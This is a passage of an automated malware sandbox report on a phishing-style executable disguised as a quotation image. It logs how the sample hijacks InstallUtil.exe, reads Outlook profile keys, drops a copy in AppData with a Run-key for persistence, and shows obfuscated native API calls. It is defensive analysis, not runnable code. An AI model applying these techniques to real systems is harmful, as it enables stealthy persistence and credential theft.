                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasman.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rtutils.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: schannel.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: mskeyprotect.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: ntasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2112460663.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004259000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.0000000002510000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.000000000346F000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.00000000036DF000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2112460663.00000000065D0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004259000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.0000000002510000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2248365081.000000000346F000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2322264218.00000000036DF000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2111673628.00000000064A0000.00000004.08000000.00040000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.64a0000.12.raw.unpack, TypeModel.cs, .Net Code: TryDeserializeList
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.64a0000.12.raw.unpack, ListDecorator.cs, .Net Code: Read
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.64a0000.12.raw.unpack, TypeSerializer.cs, .Net Code: CreateInstance
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.64a0000.12.raw.unpack, TypeSerializer.cs, .Net Code: EmitCreateInstance
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.64a0000.12.raw.unpack, TypeSerializer.cs, .Net Code: EmitCreateIfNull
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, ReflectionHelper.cs, .Net Code: InvokeMethod
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, ReflectionHelper.cs, .Net Code: InvokeMethod
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.42d1590.6.raw.unpack, XmlSerializationHelper.cs, .Net Code: ReadObjectProperties
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4c0fca0.5.raw.unpack, TypeModel.cs, .Net Code: TryDeserializeList
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4c0fca0.5.raw.unpack, ListDecorator.cs, .Net Code: Read
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4c0fca0.5.raw.unpack, TypeSerializer.cs, .Net Code: CreateInstance
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4c0fca0.5.raw.unpack, TypeSerializer.cs, .Net Code: EmitCreateInstance
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4c0fca0.5.raw.unpack, TypeSerializer.cs, .Net Code: EmitCreateIfNull
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, ReflectionHelper.cs, .Net Code: InvokeMethod
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, ReflectionHelper.cs, .Net Code: InvokeMethod
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.65d0000.13.raw.unpack, XmlSerializationHelper.cs, .Net Code: ReadObjectProperties
                Source: Yara match, File source: 6.2.Gydvapkca.exe.3efb240.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.6380000.11.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.Gydvapkca.exe.3c8b240.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.4b3b240.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.497de10.8.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.2322264218.0000000003EFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2248365081.0000000003C8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2224812433.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_064FF78C push es; retf 0_2_064FF7A0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_064FF7A1 push es; retf 0_2_064FF7A0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_064F3BC2 pushad ; ret 0_2_064F3BC9
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_065076E0 pushfd ; iretd 0_2_065076ED
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_06502291 push es; ret 0_2_065022A0
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_06500006 push es; iretd 0_2_0650001C
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_06545E79 push es; ret 0_2_06545EAC
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_06545E79 push es; iretd 0_2_06545EE4
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_0654EED8 pushfd ; retf 0_2_0654EED9
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_0654EE88 push esp; retf 0_2_0654EE89
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_06545EAD push es; iretd 0_2_06545EE4
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_06547746 push es; retf 0_2_06547748
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_06545F9D push es; ret 0_2_06545FC8
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_06543221 push ss; iretd 0_2_06543224
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_0654B870 push es; ret 0_2_0654B920
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_0654714C push cs; ret 0_2_0654714F
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_0654610E push es; retf 0_2_06546118
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_0654E1FD push ecx; iretd 0_2_0654E21C
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_065B12CA push B006593Fh; iretd 0_2_065B1325
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_065C3E89 push esi; ret 0_2_065C3E8F
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Code function: 0_2_065C3287 push ecx; iretd 0_2_065C3288
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_014D9720 push esp; ret 2_2_014D9721
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_06853181 push ebx; retf 2_2_06853182
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05902EA7 push esp; retf 3_2_05902EA8
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05A9FD99 push B005B334h; iretd 3_2_05A9FDB5
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05A93BC3 pushad ; ret 3_2_05A93BC9
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05AEEE88 push esp; retf 3_2_05AEEE89
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05AEEED8 pushfd ; retf 3_2_05AEEED9
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05AEE1FD push ecx; iretd 3_2_05AEE21C
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05AE714C push cs; ret 3_2_05AE714F
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe, Code function: 3_2_05AE3221 push ss; iretd 3_2_05AE3224
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.6280000.10.raw.unpack, wtV2nOsa2CmueAALmHi.cs, High entropy of concatenated method names: 'PFbsEwe8Je', 'U8A85IunLbckruXOhDR', 'OXjBLtu8xSCXlJah1KF', 'sn7C6IuGdhT3sheVtS2', 'P9RXemubvLWXbI1nupb', 'Dj7tppuu2qYweNJ4vxS', 'QBv2E9uOMLSi0Vf4Ble'
                Source: 0.2.RFQ____RM quotation_JPEG IMAGE.img.exe.6280000.10.raw.unpack, AjBCn8seDa4miASEKPT.cs, High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'GQls38iTt8', 'NtProtectVirtualMemory', 'w0seO0u9fbRFVTcnXsD', 'c9XCmcuIYPjMvXYXVn5', 'eWcexQu3KDyCJbDflMR', 'fgPXOhutfph5jtCyIwD'
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, File created: C:\Users\user\AppData\Roaming\Gydvapkca.exe (dropped file)
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Gydvapkca
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
